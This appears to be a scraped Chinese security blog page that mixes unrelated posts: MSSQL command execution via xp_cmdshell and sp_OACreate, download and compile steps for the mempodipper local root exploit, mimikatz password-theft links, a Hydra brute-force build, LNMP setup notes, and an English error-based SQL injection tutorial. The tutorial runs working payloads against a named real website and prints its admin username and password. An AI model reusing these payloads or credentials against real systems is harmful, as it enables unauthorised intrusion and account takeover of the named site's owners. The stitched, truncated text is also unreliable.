利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句:
EXEC master.dbo.xp_cmdshell 'dir c:\'
但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯许多人也许会放弃,因为我们无法运行任何的cmd命令,很难查看对方计算机的文件、目录、开启的服务,也无法添加NT用户。
对此作过一番研究,后来我发现即使xp_cmdshell不可用了,还是有可能在服务器上运行CMD并得到回显结果的,这里要用到SQL服务器另外的几个系统存储过程:sp_OACreate,sp_OAGetProperty和sp_OAMethod。前提是服务器上的Wscript.shell和Scripting.FileSystemObject可用。
阅读全文...
Metasploit 在 BackTrack 5-R2 中启动不起来
解决办法:
cd /opt/metasploit/common/lib
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
mv libssl.so.0.9.8 libssl.so.0.9.8-backup
ln -s /usr/lib/libcrypto.so.0.9.8
ln -s /usr/lib/libssl.so.0.9.8
msfupdate
BackBox是基于Ubuntu的发行,它被开发用于网络渗透测试及安全评估。它被设计为快捷且易于使用。它提供了一份最低纲领的但完整的桌面环境,而这得益于它自己的软件仓库,该仓库总是同步到最新版本的、最常用且以合乎道德而闻名的黑客工具。
1.下载漏洞利用文件
wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
2.编译
gcc mempodipper.c -o mempodipper
3.执行前察看
netcat@netcat:~$ uname -r
3.0.0-12-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 n lnetcat@netcat:~$ uname -a
Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)
阅读全文...
Thelong awaited release of the BackTrack 5 R2 kernel has arrived, and it’s now available in our repositories. With a spanking brand new 3.2.6 kernel, a huge array of new and updated tools and security fixes, BT5 R2 will provide a more stable and complete penetration testing environment than ever before. We will start a series of blog posts on how to upgrade, deal with VMWare, and even build your own updated BT5 R2 by yourself. For now though, here’s how to get the new kernel and all of the updated goodness:
1. Update and upgrade your BT5 (R1) installation:
原文:http://resources.infosecinstitute.com/hacking-a-wordpress-site 《Targeting and Hacking a WordPress Site》
问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的!
让我们来看看目标站点:hack-test.com
先ping下站点所在服务器的IP:
神器下载地址:
http://blog.gentilkiwi.com/mimikatz
还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass
自己尝试了下用 win2008 r2 x64 来测试
[1].安装 Nginx
1,添加一个不能登录且没有主目录的用户:
|
1
|
# useradd www -M -s /sbin/nologin |
2,必要的组件
|
1
2
3
4
5
|
# unzip pcre-8.13.zip# cd pcre-8.13# ./configure# make && make install |
3,编译nginx并安装
|
1
2
3
4
|
# tar -zxvf nginx-1.1.2.tar.gz# cd nginx-1.1.2# ./configure --prefix=/usr/local/nginx --user=www --group=www --with-http_stub_status_module --with-http_ssl_module# make && make install |
[2].安装 PHP
1,安装必要的组件
|
1
2
3
4
5
6
|
# yum -y install libjpeg-devel libpng-devel# tar -zxvf libmcrypt-2.5.7.tar.gz# cd libmcrypt-2.5.7# ./configure# make && make install |
==64位系统==
|
1
|
# ln -s /usr/lib64/mysql/ /usr/lib/mysql |
==64位系统==
2,编译php并安装
|
1
2
3
|
# cd php-5.3.8# ./configure --prefix=/usr/local/php --with-iconv --with-zlib --enable-xml --disable-rpath --enable-safe-mode --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curl --with-curlwrappers --enable-mbregex --enable-mbstring --with-mcrypt --with-gd --enable-gd-native-ttf --with-openssl --with-mhash --enable-pcntl --enable-sockets --with-xmlrpc --enable-zip --enable-soap --without-pear --with-mysql --with-mysqli --enable-sqlite-utf8 --with-pdo-mysql --enable-ftp --with-jpeg-dir --with-freetype-dir --with-png-dir --enable-fpm --with-fpm-user=www --with-fpm-group=www# make && make install |
3,拷贝和修改php配置文件
|
1
2
3
|
# cp php.ini-production /usr/local/php/lib/php.ini 或是 /usr/local/lib/php.ini# cp /usr/local/php/etc/php-fpm.conf.default /usr/local/php/etc/php-fpm.conf# /usr/local/php/bin/php --ini //测试ini文件是否加载 |
修改php.ini
|
1
2
3
4
5
6
7
8
9
10
|
[PHP]safe_mode = Onregister_globals = Offmagic_quotes_gpc = Offallow_url_fopen = Offallow_url_include = Offexpose_php=Offdisable_functions = shell_exec,system,exec,passthru,show_source,curl_exec,curl_multi_exec,get_cfg_var[Date]date.timezone = “Asia/Shanghai” |
修改php-fpm.conf
|
1
2
3
4
5
6
7
8
9
10
11
|
[global]pid = run/php-fpm.piderror_log = log/php-fpm.loglog_level = noticeemergency_restart_threshold = 0emergency_restart_interval = 0[www]pm.start_servers = 20pm.min_spare_servers = 5pm.max_spare_servers = 35pm.max_requests = 500 |
4,添加服务启动脚本
|
1
2
3
4
5
6
7
8
|
# cp nginx /etc/init.d/nginx# cp php-fpm /etc/init.d/php-fpm# chmod 755 /etc/init.d/nginx# chmod 755 /etc/init.d/php-fpm# chkconfig --add nginx# chkconfig --add php-fpm# chkconfig nginx on# chkconfig php-fpm on |
[3].安装 Mysql
3.1, 创建mysql安装目录
|
1
|
# mkdir -p /usr/local/mysql/ |
3.2, 创建数据存放目录
|
1
|
# mkdir -p /data/mysql/ |
3.3, 创建用户和用户组与赋予数据存放目录权限
|
1
2
|
# useradd mysql -M -s /sbin/nologin# chown mysql.mysql -R /data/mysql/ |
3.4, 安装必要的组件
|
1
2
|
# yum -y install cmake# yum -y install ncurses-devel |
3.5, 编译安装Mysql
|
1
2
|
# cmake -DCMAKE_INSTALL_PREFIX=/usr/local/mysql -DMYSQL_UNIX_ADDR=/data/mysql/mysql.sock -DDEFAULT_CHARSET=utf8 -DDEFAULT_COLLATION=utf8_general_ci -DWITH_EXTRA_CHARSETS:STRING=utf8,gbk -DWITH_MYISAM_STORAGE_ENGINE=1 -DWITH_INNOBASE_STORAGE_ENGINE=1 -DWITH_MEMORY_STORAGE_ENGINE=1 -DWITH_READLINE=1 -DENABLED_LOCAL_INFILE=1 -DMYSQL_DATADIR=/data/mysql -DMYSQL_USER=mysql -DMYSQL_TCP_PORT=3306# make && make install |
3.6, 初始化数据库
|
1
2
|
# cd /usr/local/mysql# scripts/mysql_install_db --user=mysql --basedir=/usr/local/mysql --datadir=/data/mysql/ |
3.7, 配置环境
|
1
2
3
4
5
|
# cp support-files/my-medium.cnf /etc/my.cnf# cp support-files/mysql.server /etc/init.d/mysql# chmod 755 /etc/init.d/mysql# chkconfig mysql on# export PATH=/usr/local/mysql/bin:$PATH |
3.8, 启动并设置初始密码
|
1
2
|
# /etc/init.d/mysql start# mysqladmin -uroot password '123123' |
进行再修改密码的语句
1: UPDATE mysql.user SET Password = PASSWORD(‘newpwd’) WHERE User = ‘root’;(生新设置密码)
2: flush privileges;(刷新权限)
第一种,直接登录root用户的图形界面,不用输入密码
1,安装rungetty
|
1
|
# apt-get install rungetty |
2,编辑 /etc/init/tty1.conf
|
1
|
# gedit /etc/init/tty1.conf |
将exec这一段注释掉并加一句
|
1
2
|
#exec /sbin/getty 38400 tty1exec /sbin/rungetty tty1 --autologin root |
3,编辑.bash_profile文件,如果没有则建立它
|
1
|
# gedit /root/.bash_profile |
|
1
|
startx |
第二种:直接启动到图形界面,提示输入用户密码
1,安装gdm
|
1
|
# sudo apt-get install gdm |
2,设置默认为gdm
|
1
|
# sudo update-rc.d gdm defaults |
3.编辑grub
|
1
|
# vim /etc/default/grub |
GRUB_CMDLINE_LINUX_DEFAULT=”text splash vga=791″
修改成quiet
GRUB_CMDLINE_LINUX_DEFAULT=”quiet splash vga=791″
4.更新grub
|
1
|
# sudo update-grub |
5.重启
|
1
|
# inti 6 |
1,VPN拔号:
|
1
2
3
4
5
6
7
|
# apt-get install network-manager-gnome# apt-get install network-manager-pptp# apt-get install network-manager-vpnc# cp /etc/network/interfaces /etc/network/interfaces.backup# echo "auto lo" > /etc/network/interfaces# echo "iface lo inet loopback" >> /etc/network/interfaces# service network-manager restart |
安装并重启network-manager后,Gnone菜单右上角出现网络的图标,点击添加VPN即可
2, Wicd Network Manager 无线连接界面出错:
Could not connect to wicd’s D-Bus interface.Check the wicd log for error messages.
解决办法:
|
1
2
|
# dpkg-reconfigure wicd# update-rc.d wicd defaults |
apt-get purge hydra
apt-get install cmake libssl-dev
cd /usr/local/src
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
tar zxf libssh-0.4.8.tar.gz
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install
cd /usr/local/src
wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
tar zxf hydra-6.3-src.tar.gz
cd hydra-6.3-src
./configure
make
make install
最后来张效果图
虽然没成功爆出密码,但是能看出爆破速度效率还是不错的
So a few XPath Injection tutorials have been getting posted, and since I haven't seen much info on the updatexml method, I'd thought I'd make a quick tutorial for it.Now I'll be going over both methods just for the sake of adding it to my mega-thread.
Extract Value
I'll be using this site as an example.
Version (ExtractValue)
This will return our XPATH Syntax error, and give us our version.
This is what my link looks like.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,version()))--
You should get your version.
Getting The Tables (Extract Value)
Code:+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema. tables+where+table_schema=database()+limit+0,1)))--
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from +information_schema.tables+where+table_schema=database()+limit+0,1)))--
So lets load it up and see if we get our first table name!
Code:
XPATH syntax error: '~pdigclicks'
Woot it worked! Now we just increment in our limit statement until we find our table we want columns from.
Code:
XPATH syntax error: '~pdigengine'
(#‵′)凸
We want users or admin..
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from +information_schema.tables+where+table_schema=database()+limit+[b]2[/b],1)))--
Code:
XPATH syntax error: '~pdigexcludes'
Woot, now let's get the columns.
Getting The Columns (ExtractValue)
First off, we want to convert our table name to hex.
My table name was tbladmin.
Whenever you convert something to hex, you add 0x in front of it.
It tells the site to read the hex value.
The hex of tbladmin is 74626c61646d696e
So it should look like this.
Code:0x74626c61646d696e
Now to get our columns, we change our syntax a bit, but it's still generally the same idea.
Code:+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema .columns+where+table_name=0xTABLE_HEX+limit+0,1)))--]
Of course, replace TABLE_HEX with the hex value of your table name.
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+column_name+fro m+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1)))--
Now use increment in your limit statement until you find the columns you want.
Getting Data Out of Columns (ExtractValue)
Now that you've got your column names, you're going to want to put them in a concat statement.
Code:+and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+TABLENAME+limit+0,1)))--
My columns I wanted were username and password, the 0x7e is the hex value of "~" which I'll use as a seperator.
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+concat(username ,0x7e,password)+from+tbladmin+limit+0,1)))--
And as you can see, we get our XPath error with the admin login.
Code:XPATH syntax error: '~ishir~ishir123'
UpdateXML
Getting The Version (UpdateXML)
My link looks like this..
We get our XPATH Error that returns the version.
Code:
Getting The Tables (UpdateXML)
My link looks like this..
Code:
Now we know our first table is called pdigclicks. Let's see what else is in here....
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ from+information_schema.tables+where+table_schema=database()+limit+1,1))),0)--
For the sake of time, I know the table name I want is tbladmin.
Code:leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ from+information_schema.tables+where+table_schema=database()+limit+10,1))),0)--
And there's our table.
Code:
Now let's get the columns from the table.
Getting Columns (UpdateXML)
Now it's the same idea, we just change the tables to columns, from the table name.
Now my table name was tbladmin, so I convert that to hex and get 74626c61646d696e
My link looks like this.
Getting Data (UpdateXML)
Now once you've got your columns, concatenate them and get the from the table you want.
Code:
My link looks like this..
Code:
姓名:Chinadu
性别:Man
职业:网络安全从业者
E-mail:imcto#msn.cn
近期评论